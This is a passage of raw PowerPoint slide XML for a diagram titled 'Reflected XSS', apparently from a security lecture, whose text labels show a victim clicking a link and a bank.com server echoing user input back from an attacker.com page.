          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7159625" y="6278372"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Title 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED38906-173A-EB47-9C98-5F462B354BCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6C0B9A-5A6F-B944-971B-A219C5A73245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="5208588"/>
            <a:ext cx="1152110" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="4191000"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="5094017"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3131668" y="4324147"/>
            <a:ext cx="1325052" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2417361" y="4699080"/>
            <a:ext cx="1828745" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-157" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714739" y="3933939"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
